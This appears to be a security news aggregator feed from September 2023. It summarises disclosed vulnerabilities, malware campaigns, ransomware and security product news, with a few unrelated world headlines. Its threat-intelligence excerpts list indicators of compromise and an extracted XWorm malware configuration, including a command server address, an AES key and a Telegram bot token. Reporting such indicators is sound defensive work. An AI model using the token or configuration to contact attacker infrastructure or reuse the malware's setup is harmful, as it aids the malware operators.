            Cybersecurity company Trend Micro has released patches and hotfixes to address a critical security flaw in Apex One and Worry-Free Business Security solutions for Windows that has been actively exploited in real-world attacks. Tracked as CVE-2023-41179 (CVSS score: 9.1), it relates to a third-party antivirus uninstaller module that’s bundled along with the software. The complete list of impacted

            Autosummary: Zyxel EMG2926 Routers Command Injection Vulnerability; CVE-2021-3129 (CVSS score: 9.8) - Laravel Ignition File Upload Vulnerability; CVE-2022-22265 (CVSS score: 7.8) - Samsung Mobile Devices Use-After-Free Vulnerability; CVE-2022-31459 (CVSS score: 6.5) - Owl Labs Meeting Owl Inadequate Encryption Strength Vulnerability; CVE-2022-31461 (CVSS score: 6.5) - Owl Labs Meeting Owl


            Trend Micro addresses actively exploited zero-day in Apex One and other security Products

            exploits
            2023-09-20 https://securityaffairs.com/151095/hacking/trend-micro-apex-one-zero-day-flaw.html

            Trend Micro addressed a zero-day code execution vulnerability (CVE-2023-41179) in Apex One that has been actively exploited in the wild. Trend Micro has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products.  According to the security […]

            The post Trend Micro addresses actively exploited zero-day in Apex One and other security Products appeared first on Security Affairs.

            Autosummary: Trend Micro has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products.


            What a mess! Clorox warns of “material impact” to its financial results following cyberattack

            financial ciber
            2023-09-20 https://www.bitdefender.com/blog/hotforsecurity/what-a-mess-clorox-warns-of-material-impact-to-its-financial-results-following-cyberattack/
            Clorox, the household cleaning product manufacturer, has admitted that its financial results for the first quarter could see a "material impact" after hackers attacked its systems. Read more in my article on the Hot for Security blog.


            Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor

            industry
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/red-hat-intel/

            Red Hat announced a new industrial edge platform, designed in collaboration with Intel, that will provide a modern approach to building and operating industrial controls. By transforming the way manufacturers operate, scale and innovate with standard IT technologies delivered to the plant floor and real-time data insights, the platform will enable industrial control system (ICS) vendors, system integrators (SIs) and manufacturers to automate previously manual industrial automation tasks including: system development, deployment and management, cybersecurity … More

            The post Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor appeared first on Help Net Security.

            Autosummary: With this collaboration organizations can benefit from: fully integrated real-time capabilities from silicon to software, to support industrial automation for predictable performance; advanced management and network automation for system deployment and management without heavy-handed resource usage, simplifying industrial network creation and management using open standards-based tools; scalability and flexibility through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; uninterrupted operations supported by high-availability and redundancy attributes built into the platform; simplified AI workload integration with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; and an enhanced cybersecurity posture by removing human error elements with automated patching and updates, an immutable operating system plane and a platform built on hardened, production-tested components.


            GitLab Releases Urgent Security Patches for Critical Vulnerability

            exploits
            2023-09-20 https://thehackernews.com/2023/09/gitlab-releases-urgent-security-patches.html
            GitLab has shipped security patches to resolve a critical flaw that allows an attacker to run pipelines as another user. The issue, tracked as CVE-2023-5009 (CVSS score: 9.6), impacts all versions of GitLab Enterprise Edition (EE) starting from 13.12 and prior to 16.2.7 as well as from 16.3 and before 16.3.4. "It was possible for an attacker to run pipelines as an arbitrary user via scheduled


            GitLab addressed critical vulnerability CVE-2023-5009

            exploits
            2023-09-20 https://securityaffairs.com/151107/security/gitlab-critical-vulnerability-cve-2023-5009.html

            GitLab rolled out security patches to address a critical vulnerability, tracked as CVE-2023-5009, that can be exploited to run pipelines as another user. GitLab has released security patches to address a critical vulnerability, tracked as CVE-2023-5009 (CVSS score: 9.6), that allows an attacker to run pipelines as another user. The issue resides in GitLab EE and affects […]

            The post GitLab addressed critical vulnerability CVE-2023-5009 appeared first on Security Affairs.



            Sophisticated Phishing Campaign Targeting Chinese Users with ValleyRAT and Gh0st RAT

            financial
            2023-09-20 https://thehackernews.com/2023/09/sophisticated-phishing-campaign_20.html
            Chinese-language speakers have been increasingly targeted as part of multiple email phishing campaigns that aim to distribute various malware families such as Sainbox RAT, Purple Fox, and a new trojan called ValleyRAT. "Campaigns include Chinese-language lures and malware typically associated with Chinese cybercrime activity," enterprise security firm Proofpoint said in a report shared with The


            Fake WinRAR proof-of-concept exploit drops VenomRAT malware

            exploits
            2023-09-20 https://www.bleepingcomputer.com/news/security/fake-winrar-proof-of-concept-exploit-drops-venomrat-malware/
            A hacker is spreading a fake proof-of-concept (PoC) exploit for a recently fixed WinRAR vulnerability on GitHub, attempting to infect downloaders with the VenomRAT malware. [...]

            Autosummary: In late 2022, researchers unearthed thousands of GitHub repositories promoting fraudulent PoC exploits for diverse vulnerabilities, with several deploying malware, malicious PowerShell scripts, concealed info-stealer downloaders, and Cobalt Strike droppers. [Figure: Real PoC (left) and modified script (right) (Unit 42)] When executed, instead of running the exploit, the PoC creates a batch script that downloads an encoded PowerShell script and executes it on the host.


            Expensive Investigations Drive Surging Data Breach Costs

            financial
            2023-09-20 https://www.bleepingcomputer.com/news/security/expensive-investigations-drive-surging-data-breach-costs/
            Data breaches and their investigations are becoming extremely costly for the enterprise. Learn from Outpost24 below about what your business can do to reduce these costs. [...]

            Autosummary: Each year, IBM’s eagerly anticipated Cost of a Data Breach Report seems to come with the bad news of an increase in data breach costs, and 2023 is no exception. Data breach investigation costs: investigating a data breach involves a resource-intensive combination of technical, administrative, legal, and communication activities, which together prove rather pricey for companies. Here are some suggestions for preventing data breaches in the first place. Robust information governance: information governance defines and enforces policies, procedures, standards, and controls around the management of data. Our in-house team of analysts uses 13+ years of historical threat data along with continuously trawling the open, deep, and dark web to discover customer-specific threat information.


            McAfee Scam Protection blocks fake emails, texts, and social media links

            financial
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/mcafee-scam-protection/

            McAfee launched McAfee Scam Protection to address the rise in AI-generated phishing scams. The latest feature in McAfee’s product suite draws on patented AI technology to turn the tables on cybercriminals using AI to turbocharge scams and deceive people out of thousands of dollars. With the help of AI, cybercriminals are creating more convincing, personalized scams, at scale. Phishing scams are the number one cybersecurity threat worldwide, with a new phishing site created every 11 … More

            The post McAfee Scam Protection blocks fake emails, texts, and social media links appeared first on Help Net Security.

            Autosummary: “It’s why we all need the most advanced, innovative AI working in our favor, to proactively protect us, in real-time, before we even know we’ve been targeted,” said Greg Johnson, McAfee Chief Executive Officer.


            NordVPN Sonar helps internet users detect phishing emails

            financial
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/nordvpn-sonar/

            NordVPN launched its first experimental project under the NordLabs platform. The AI-enabled browser extension Sonar aims to help internet users detect phishing emails and protect themselves from cybercrimes. “AI tools have facilitated the automation of a significant portion of phishing attacks, and it is anticipated that the frequency of such attacks will escalate in the future, posing a significant cybersecurity threat. With this new release we aim to fight fire with fire. Sonar is based … More

            The post NordVPN Sonar helps internet users detect phishing emails appeared first on Help Net Security.

            Autosummary: Last week, NordVPN launched NordLabs, a platform to explore emerging technologies, such as AI, and create new tools and services to ensure the security and privacy of internet users.


            P2PInfect botnet activity surges 600x with stealthier malware variants

            exploits
            2023-09-20 https://www.bleepingcomputer.com/news/security/p2pinfect-botnet-activity-surges-600x-with-stealthier-malware-variants/
            The P2PInfect botnet worm is going through a period of highly elevated activity volumes starting in late August and then picking up again in September 2023. [...]

            Autosummary: Cado Security researchers, who have been following the botnet since late July 2023, report today seeing global activity, with most breaches impacting systems in China, the United States, Germany, Singapore, Hong Kong, the UK, and Japan.


            Free Download Manager releases script to check for Linux malware

            exploits
            2023-09-20 https://www.bleepingcomputer.com/news/security/free-download-manager-releases-script-to-check-for-linux-malware/
            The developers of Free Download Manager (FDM) have published a script to check if a Linux device was infected through a recently reported supply chain attack. [...]


            DoppelPaymer ransomware group suspects identified

            exploits ransomware
            2023-09-20 https://www.malwarebytes.com/blog/news/2023/09/doppelpaymer-ransomware-group-suspects-identified

            Categories: News

            Categories: Ransomware

            More DoppelPaymer ransomware group suspects have been identified by blockchain investigations and had search warrants executed against them.


            The post DoppelPaymer ransomware group suspects identified appeared first on Malwarebytes Labs.

            Autosummary: Other victims attacked by DoppelPaymer in the past include Compal, PEMEX (Petróleos Mexicanos), the City of Torrance in California, Newcastle University, Hall County in Georgia, Banijay Group SAS, and Bretagne Télécom. In March of 2023, we reported how the German Regional Police and the Ukrainian National Police, with support from Europol, the Dutch Police, and the United States Federal Bureau of Investigation (FBI), apprehended two suspects and seized computer equipment. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


            Inside Tiktok’s real-life frenzies - from riots to false murder accusations

            industry
            2023-09-20 https://www.bbc.co.uk/news/technology-66719572?at_medium=RSS&at_campaign=KARANGA
            Former staff and users tell the BBC the app’s algorithm has encouraged harmful real-life behaviour.


            Transparent Tribe Uses Fake YouTube Android Apps to Spread CapraRAT Malware

            exploits
            2023-09-19 https://thehackernews.com/2023/09/transparent-tribe-uses-fake-youtube.html
            The suspected Pakistan-linked threat actor known as Transparent Tribe is using malicious Android apps mimicking YouTube to distribute the CapraRAT mobile remote access trojan (RAT), demonstrating the continued evolution of the activity. "CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects," SentinelOne security


            Earth Lusca expands its arsenal with SprySOCKS Linux malware

            exploits
            2023-09-19 https://securityaffairs.com/151020/apt/sprysocks-backdoor-earth-lusca.html

            China-linked threat actor Earth Lusca used a new Linux malware dubbed SprySOCKS in a recent cyber espionage campaign. Researchers from Trend Micro, while monitoring the activity of the China-linked threat actor Earth Lusca, discovered an encrypted file hosted on a server under the control of the group. Additional analysis led to the discovery of a […]

            The post Earth Lusca expands its arsenal with SprySOCKS Linux malware appeared first on Security Affairs.

            Autosummary: The group is targeting public-facing servers attempting to exploit server-based N-day vulnerabilities, including: CVE-2022-40684, an authentication bypass vulnerability in Fortinet FortiOS, FortiProxy and FortiSwitchManager; CVE-2022-39952, an unauthenticated remote code execution (RCE) vulnerability in Fortinet FortiNAC; CVE-2021-22205, an unauthenticated RCE vulnerability in GitLab CE/EE; CVE-2019-18935, an unauthenticated remote code execution vulnerability in Progress Telerik UI for ASP.NET AJAX; CVE-2019-9670 / CVE-2019-9621, a bundle of two vulnerabilities for unauthenticated RCE in Zimbra Collaboration Suite; and ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). The malware supports multiple commands, including collecting system information, starting an interactive shell, listing network connections, creating a SOCKS proxy, uploading and downloading files, and other basic file operations (listing, deleting, renaming, and creating a directory).


            NightDragon and CyberKnight strengthen cybersecurity in the Middle East, Turkey and Africa

            ciber
            2023-09-19 https://www.helpnetsecurity.com/2023/09/19/nightdragon-cyberknight/

            NightDragon announced a new strategic partnership with CyberKnight to continue the international expansion capabilities of its portfolio companies and bring the latest CSSP innovations to customers in the Middle East, Turkey, Africa (META) and other regions. CyberKnight has rapidly grown into the largest pure-play cybersecurity VAD in the Middle East in just under four years. Through its strategic partner channel, it helps more than 500 enterprise and government customers implement leading solutions to simplify breach … More

            The post NightDragon and CyberKnight strengthen cybersecurity in the Middle East, Turkey and Africa appeared first on Help Net Security.


            Autosummary: Through its strategic partner channel, it helps more than 500 enterprise and government customers implement leading solutions to simplify breach detection, prevention, and incident response, as well as implement regulatory compliance, zero trust practices, critical infrastructure protection, artificial intelligence (AI), threat intelligence, and more.


            Operation Rusty Flag: Azerbaijan Targeted in New Rust-Based Malware Campaign

            exploits
            2023-09-19 https://thehackernews.com/2023/09/operation-rusty-flag-azerbaijan.html
            Targets located in Azerbaijan have been singled out as part of a new campaign that's designed to deploy Rust-based malware on compromised systems. Cybersecurity firm Deep Instinct is tracking the operation under the name Operation Rusty Flag. It has not been associated with any known threat actor or group. "The operation has at least two different initial access vectors," security researchers

            Autosummary: An alternate infection vector is a Microsoft Office document named "Overview_of_UWCs_UkraineInNATO_campaign.docx," which exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office's Equation Editor, to invoke a Dropbox URL hosting a different MSI file serving a variant of the same Rust backdoor.


            Earth Lusca's New SprySOCKS Linux Backdoor Targets Government Entities

            government
            2023-09-19 https://thehackernews.com/2023/09/earth-luscas-new-sprysocks-linux.html
            The China-linked threat actor known as Earth Lusca has been observed targeting government entities using a never-before-seen Linux backdoor called SprySOCKS. Earth Lusca was first documented by Trend Micro in January 2022, detailing the adversary's attacks against public and private sector entities across Asia, Australia, Europe, and North America. Active since 2021, the group has relied on

            Autosummary: Infection sequences start with the exploitation of known security flaws in public-facing Fortinet (CVE-2022-39952 and CVE-2022-40684), GitLab (CVE-2021-22205), Microsoft Exchange Server (ProxyShell), Progress Telerik UI (CVE-2019-18935), and Zimbra (CVE-2019-9621 and CVE-2019-9670) servers to drop web shells and deliver Cobalt Strike for lateral movement.


            Nearly 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability

            exploits
            2023-09-19 https://thehackernews.com/2023/09/over-12000-juniper-firewalls-found.html
            New research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw. VulnCheck, which discovered a new exploit for CVE-2023-36845, said it could be exploited by an "unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system." CVE-2023-36845 refers to a



            Mexico "alien bodies": Those viral artefacts get lab tests

            latam
            2023-09-19 https://www.bbc.co.uk/news/world-66853551?at_medium=RSS&at_campaign=KARANGA
            There's been widespread scepticism about the "bodies" presented to Mexican authorities by a UFO enthusiast.



            Hackers backdoor telecom providers with new HTTPSnoop malware

            exploits
            2023-09-19 https://www.bleepingcomputer.com/news/security/hackers-backdoor-telecom-providers-with-new-httpsnoop-malware/
            New malware strains named HTTPSnoop and PipeSnoop are being used in cyberattacks on telecommunication service providers in the Middle East, allowing threat actors to remotely execute commands on infected devices. [...]

            Autosummary: URLs HTTPSnoop is configured to listen for (Cisco). PipeSnoop: Cisco first spotted the PipeSnoop implant in May 2023, acting as a backdoor that executes shellcode payloads on breached endpoints through Windows IPC (Inter-Process Communication) pipes.


            Trend Micro fixes endpoint protection zero-day used in attacks

            exploits
            2023-09-19 https://www.bleepingcomputer.com/news/security/trend-micro-fixes-endpoint-protection-zero-day-used-in-attacks/
            Trend Micro fixed a remote code execution zero-day vulnerability in its Apex One endpoint protection solution that was actively exploited in attacks. [...]



            Claimants in Celsius crypto bankruptcy targeted in phishing attack

            financial
            2023-09-19 https://www.bleepingcomputer.com/news/security/claimants-in-celsius-crypto-bankruptcy-targeted-in-phishing-attack/
            Scammers are impersonating the bankruptcy claim agent for crypto lender Celsius in phishing attacks that attempt to steal funds from cryptocurrency wallets. [...]

            Autosummary: The phishing email carried the following authentication header:
            ARC-Authentication-Results: i=1; mx.google.com; dkim=pass header.i=@stretto.com header.s=s1 header.b=xx; spf=pass (google.com: domain of bounces+xxx-xxx-xx=xxx.com@em6462.stretto.com designates 149.72.171.199 as permitted sender) smtp.mailfrom="bounces+xxx-xxx-xx=xxx.com@em6462.stretto.com"; dmarc=pass (p=QUARANTINE sp=QUARANTINE dis=NONE) header.from=stretto.com
            A recipient of one of these phishing emails told BleepingComputer that they did not have an account at Celsius and never filed as a creditor, making it strange that they received this email.


            Compromised Free Download Manager website was delivering malware for years

            exploits
            2023-09-19 https://www.malwarebytes.com/blog/news/2023/09/compromised-free-download-manager-website-was-delivering-malware-for-years

            Categories: News

            Tags: Free Download Manager

            Tags: Linux

            Tags: Debian

            Tags: crond

            Tags: reverse shell

            After three years of delivering malware to selected visitors, Free Download Manager was alerted to the fact that its website had been compromised.


            The post Compromised Free Download Manager website was delivering malware for years appeared first on Malwarebytes Labs.


            Autosummary: Browser Guard blocks fdmpkg.org.
            Indicators of Compromise (IOCs):
            File hashes (SHA-256): b77f63f14d0b2bde3f4f62f4323aad87194da11d71c117a487e18ff3f2cd468d, 2214c7a0256f07ce7b7aab8f61ef9cbaff10a456c8b9f2a97d8f713abd660349, 93358bfb6ee0caced889e94cd82f6f417965087203ca9a5fce8dc7f6e1b8a3ea, d73be6e13732d365412d71791e5eb1096c7bb13d6f7fd533d8c04392ca0b69b5
            File locations: /etc/cron.d/collect, /var/tmp/crond, /var/tmp/bs, /var/tmp/atd
            IP and domain: 172.111.48.101, fdmpkg.org
            Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected.


            Colombian dissident Farc rebels agree to ceasefire

            latam
            2023-09-19 https://www.bbc.co.uk/news/world-latin-america-66861726?at_medium=RSS&at_campaign=KARANGA
            The ceasefire is set to begin in early October and - if successful - last until August 2024.



            Inside XWorm: Malware Analysts Decode the Stealthy Tactics of the Latest Variant

            exploits industry
            2023-09-19 https://thehackernews.com/2023/09/inside-code-of-new-xworm-variant.html
            XWorm is a relatively new representative of the remote access trojan cohort that has already earned its spot among the most persistent threats across the globe. Since 2022, when it was first observed by researchers, it has undergone a number of major updates that have significantly enhanced its functionality and solidified its staying power. The analyst team at ANY.RUN came across the newest

            Autosummary: XWorm's Tactics, Techniques, and Procedures (TTPs): The sandbox report highlighted several techniques used by the sample. [Figure 3: XWorm's activities on the infected system.] Extracted configuration:
            Host: 6[.]tcp.eu.ngrok[.]io
            Port: 13394
            AES key: Slaves!-.;!2Swezy999!(xxx
            Splitter: Xwormmm
            Sleep time: 3
            USB drop file: USB.exe
            Mutex: Lz8qftMH08V7f1rq
            Log file: %temp%\\Log.tmp
            Telegram token: 6674821695:AAExQsr6_hmXk6hz7CN4kMSi9cs9y86daYM
            Telegram chat id: 5865520781
            Conclusion: Obtaining configurations of the latest malware is crucial but time-consuming. XWorm's failed attempt to evade sandbox analysis: Since the initial analysis report was several days old, the team decided to run the sample through the sandbox once again to check for new activities. From there, the only logical step for the team was to open the file in dnSpy, a .NET debugger, which promptly revealed that the binary was subject to heavy obfuscation.


            Financially Motivated UNC3944 Threat Actor Shifts Focus to Ransomware Attacks

            financial exploits ransomware
            2023-09-18 https://thehackernews.com/2023/09/financially-motivated-unc3944-threat.html
            The financially motivated threat actor known as UNC3944 is pivoting to ransomware deployment as part of an expansion to its monetization strategies, Mandiant has revealed. "UNC3944 has demonstrated a stronger focus on stealing large amounts of sensitive data for extortion purposes and they appear to understand Western business practices, possibly due to the geographical composition of the group,

            Autosummary: The group, also known by the names 0ktapus, Scatter Swine, and Scattered Spider, has been active since early 2022, adopting phone-based social engineering and SMS-based phishing to obtain employees' valid credentials using bogus sign-in pages and infiltrate victim organizations, mirroring tactics adopted by another group called LAPSUS$. While the group originally focused on telecom and business process outsourcing (BPO) companies, it has since expanded its targeting to include hospitality, retail, media and entertainment, and financial services, illustrative of the growing threat.


            Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion

            industry ciber
            2023-09-18 https://www.helpnetsecurity.com/2023/09/18/darren-sankbeil-dragos-ics-ot-environments-cybersecurity/

            Today, Dragos revealed that it has secured a $74 million Series D extension funding round, spearheaded by the strategic operating and investment firm WestCap. The funding extension comes at a time when global governments and infrastructure providers increasingly acknowledge the critical role of industrial cybersecurity, necessitating an enhanced focus on their ICS/OT settings. In an interview with Help Net Security, Darren Sankbeil, CFO of Dragos, discusses the significance of this investment for the firm amid the rising urgency to … More

            The post Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion appeared first on Help Net Security.


            Autosummary: In addition to our historically strong presence in the Electric, Oil & Gas, Water, and Federal Government sectors, we are seeing the Manufacturing, Food and Beverage, and Technology sectors increase in prominence as a percentage of our business. The Dragos Platform is technology built for practitioners by practitioners that arms industrial cybersecurity teams with the most up-to-date defensive tools, codified by our experts on the front lines every day hunting, combatting, and responding to advanced ICS threats. We launched the Dragos Global Partner Program this year, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence as well as training.


            Retool Falls Victim to SMS-Based Phishing Attack Affecting 27 Cloud Clients

            financial
            2023-09-18 https://thehackernews.com/2023/09/retool-falls-victim-to-sms-based.html
            Software development company Retool has disclosed that the accounts of 27 of its cloud customers were compromised following a targeted and SMS-based social engineering attack. The San Francisco-based firm blamed a Google Account cloud synchronization feature recently introduced in April 2023 for making the breach worse, calling it a "dark pattern." "The fact that Google Authenticator syncs to

            Autosummary: "Based on analysis of suspected UNC3944 phishing domains, it is plausible that the threat actors have, in some cases, used access to victim environments to obtain information about internal systems and leveraged that information to facilitate more tailored phishing campaigns," Mandiant disclosed last week.


            Kubernetes vulnerability allows RCE on Windows endpoints (CVE-2023-3676)

            exploits
            2023-09-18 https://www.helpnetsecurity.com/2023/09/18/cve-2023-3676/

            Three high-severity Kubernetes vulnerabilities (CVE-2023-3676, CVE-2023-3893, CVE-2023-3955) could allow attackers to execute code remotely and gain control over all Windows nodes in the Kubernetes cluster. About the vulnerabilities CVE-2023-3676, discovered by Akamai researcher Tomer Peled, is a command injection vulnerability that can be exploited by applying a malicious YAML file on the cluster. “The Kubernetes framework uses YAML files for basically everything — from configuring the Container Network Interface to pod management and even secret … More

            The post Kubernetes vulnerability allows RCE on Windows endpoints (CVE-2023-3676) appeared first on Help Net Security.




            Hook: New Android Banking Trojan That Expands on ERMAC's Legacy

            financial exploits
            2023-09-18 https://thehackernews.com/2023/09/hook-new-android-banking-trojan-that.html
            A new analysis of the Android banking trojan known as Hook has revealed that it's based on its predecessor called ERMAC. "The ERMAC source code was used as a base for Hook," NCC Group security researchers Joshua Kamp and Alberto Segura said in a technical analysis published last week. "All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also

            Autosummary: Once the malware has infected the victim's machine, it can steal a wide range of sensitive information, including contacts, SMS messages, call logs, images, audio files, screen recordings, and screenshots. A majority of Hook and ERMAC's command-and-control (C2) servers are located in Russia, followed by the Netherlands, the U.K., the U.S., Germany, France, Korea, and Japan.


            Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry

            financial industry
            2023-09-18 https://securityaffairs.com/150981/hacking/retool-smishing-attack.html

            Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. Software development company Retool revealed that 27 accounts of its cloud customers were compromised as a result of an SMS-based social engineering attack. The company states that one of its employees was […]

            The post Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry appeared first on Security Affairs.


            Autosummary: But through this Google update, what was previously multi-factor authentication had silently (to administrators) become single-factor authentication, because control of the Okta account led to control of the Google account, which led to control of all OTPs stored in Google Authenticator.


            Bumblebee malware returns in new attacks abusing WebDAV folders

            exploits
            2023-09-18 https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-in-new-attacks-abusing-webdav-folders/
            The malware loader "Bumblebee" has broken its two-month vacation with a new campaign that employs new distribution techniques that abuse 4shared WebDAV services. [...]

            Autosummary: Here, too, Intel471 spotted several variations of the command set, from mounting the file copies to extracting and executing the files from the mounted drive, which is another indication of trial-and-error aimed at optimization.


            New SprySOCKS Linux malware used in cyber espionage attacks

            exploits
            2023-09-18 https://www.bleepingcomputer.com/news/security/new-sprysocks-linux-malware-used-in-cyber-espionage-attacks/
            A Chinese espionage-focused hacker tracked as "Earth Lusca" was observed targeting government agencies in multiple countries, using a new Linux backdoor dubbed "SprySOCKS." [...]

            Autosummary: The main backdoor functionalities of this novel malware include: collecting system information (OS details, memory, IP address, group name, language, CPU), starting an interactive shell that uses the PTY subsystem, listing network connections, managing SOCKS proxy configurations, and performing basic file operations (uploading, downloading, listing, deleting, renaming, and creating directories).


            SentiLink unveils Facets to improve financial fraud detection

            financial
            2023-09-18 https://www.helpnetsecurity.com/2023/09/18/sentilink-facets/

            SentiLink launched Facets, a new intelligent attributes solution that enables U.S. financial institutions to improve fraud models and implement more sophisticated onboarding flows. The solution provides feature-specific intelligence derived from SentiLink’s proprietary identity data and from its broad consortium of leading banks, credit unions and fintechs. This new tool allows SentiLink’s partners to improve their models and accelerate how they make risk-based decisions. As financial fraud techniques become more sophisticated and complex, financial institutions are … More

            The post SentiLink unveils Facets to improve financial fraud detection appeared first on Help Net Security.


            Autosummary: Augment decisioning data – Facets enhances financial institutions’ in-house fraud models with flexible, intelligent data points for targeting the nuances of fraud in their application population and creating more actionable insights that fraud teams can leverage to make data-driven decisions.


            German intelligence warns cyberattacks could target liquefied natural gas (LNG) terminals

            ciber
            2023-09-18 https://securityaffairs.com/150999/hacking/liquefied-natural-gas-lng-terminals-cyber-attacks.html

            The head of Germany’s foreign intelligence service warns of state-sponsored attacks aimed at liquefied natural gas (LNG) terminals in the country. Bruno Kahl, the President of the Bundesnachrichtendienst intelligence service since 2016, warned of state-sponsored attacks aimed at liquefied natural gas (LNG) terminals in the country. After the Russian invasion of Ukraine, the German government […]

            The post German intelligence warns cyberattacks could target liquefied natural gas (LNG) terminals appeared first on Security Affairs.




            Peru coach crash: 24 killed as bus falls into ravine

            latam
            2023-09-18 https://www.bbc.co.uk/news/world-latin-america-66844172?at_medium=RSS&at_campaign=KARANGA
            The coach veered off a highway at night high in the Andes mountains before plunging 200m (650ft).



            APT36 state hackers infect Android devices using YouTube app clones

            government
            2023-09-18 https://www.bleepingcomputer.com/news/security/apt36-state-hackers-infect-android-devices-using-youtube-app-clones/
            The APT36 hacking group, aka "Transparent Tribe," has been observed using at least three Android apps that mimic YouTube to infect devices with their signature remote access trojan (RAT), "CapraRAT." [...]



            Malwarebytes named leader across six endpoint security categories, marking its ease of use, in G2 Fall 2023 results

            exploits
            2023-09-18 https://www.malwarebytes.com/blog/business/2023/09/malwarebytes-named-leader-across-six-endpoint-security-categories-in-g2-fall-2023

            Categories: Business

            Malwarebytes is the only vendor recognized as “Easiest to Use” with the “Easiest Admin” for its EDR and MDR solutions in the recent G2 Fall 2023 results.


            The post Malwarebytes named leader across six endpoint security categories, marking its ease of use, in G2 Fall 2023 results appeared first on Malwarebytes Labs.


            Autosummary: #1 overall Usability index, underscoring Malwarebytes’ commitment to building effective solutions that are easy to deploy, use, and manage. Badges: Most Implementable, Easiest Setup, Best Results, Easiest to Use, Easiest Admin, Best Usability. In the Managed Detection and Response (MDR) category: The Malwarebytes MDR solution provides 24x7 threat monitoring and investigations without the expense of building and running a SOC in-house. (Dennis Davis, IT Systems Manager, Drummond) Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense. Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.


            ThemeBleed exploit is another reason to patch Windows quickly

            exploits
            2023-09-18 https://www.malwarebytes.com/blog/news/2023/09/themebleed-exploit-is-another-reason-to-patch-windows-quickly

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: theme

            Tags: themepack

            Tags: Microsoft

            Tags: cve-2023-38146

            Tags: msstyles

            An exploit has been released for a vulnerability in Windows .theme files that was patched in the September 2023 Patch Tuesday update.


            The post ThemeBleed exploit is another reason to patch Windows quickly appeared first on Malwarebytes Labs.


            Autosummary: Microsoft assigned a CVSS score of 8.8 (out of 10) and gave it a severity rating of “Important”, saying: “An attacker would need to convince a targeted user to load a Windows Themes file on a vulnerable system with access to an attacker-controlled SMB share.” The .theme files contain references to .msstyles files, which should contain no code, only graphical resources that are loaded when the theme file invoking them is opened.


            Ransomware group steps up, issues statement over MGM Resorts compromise

            exploits government
            2023-09-18 https://www.malwarebytes.com/blog/personal/2023/09/ransomware-group-steps-up-issues-statement-over-mgm-resorts-compromise

            Categories: Business

            Tags: MGM Resorts

            Tags: hotel

            Tags: casino

            Tags: ransomware

            Tags: blackcap

            Tags: ALPHV

            We take a look at a ransomware group's claims that they were the ones responsible for the MGM Resorts attack.


            The post Ransomware group steps up, issues statement over MGM Resorts compromise appeared first on Malwarebytes Labs.


            Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The statement begins: "Statement on MGM Resorts International: Setting the record straight. 9/14/2023, 7:46:49 PM. We have made multiple attempts to reach out to MGM Resorts International, 'MGM'." There are also claims that the attackers still have access to the MGM Resorts network, despite the shutdown and clean-up operation taking place. The ALPHV ransomware group had not privately or publicly claimed responsibility for an attack before this point. They don’t just use password reset impersonation, but also phishing, SIM swapping (hijacking someone’s mobile number), and even MFA fatigue, where the mission is to annoy an employee with so many alerts that they eventually say “yes”.


            10 tips to ace your cybersecurity job interview

            ciber
            2023-09-18 https://www.welivesecurity.com/en/we-live-progress/10-tips-ace-cybersecurity-job-interview/
            Once you’ve made it past the initial screening process and secured that all-important interview, it’s time to seal the deal. These 10 tips will put you on the right track.

            Autosummary: What to expect: Nailing the interview will likely require a combination of technical knowledge, problem-solving skills, and the ability to effectively communicate your expertise. An interview with someone senior in the company, possibly even a C-level executive, will come last, and is the time to prove you’re the right cultural fit and that you’re hungry for the role. 10 top tips for interview success: Do your research. This might sound obvious, but the first step is to understand the company you’re applying to join. You may want to tailor your preparation to the specific role you're applying for, whether it's a security analyst, penetration tester, or security engineer.


            #StopRansomware: Snatch Ransomware

            exploits ransomware
            2023-09-18 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.

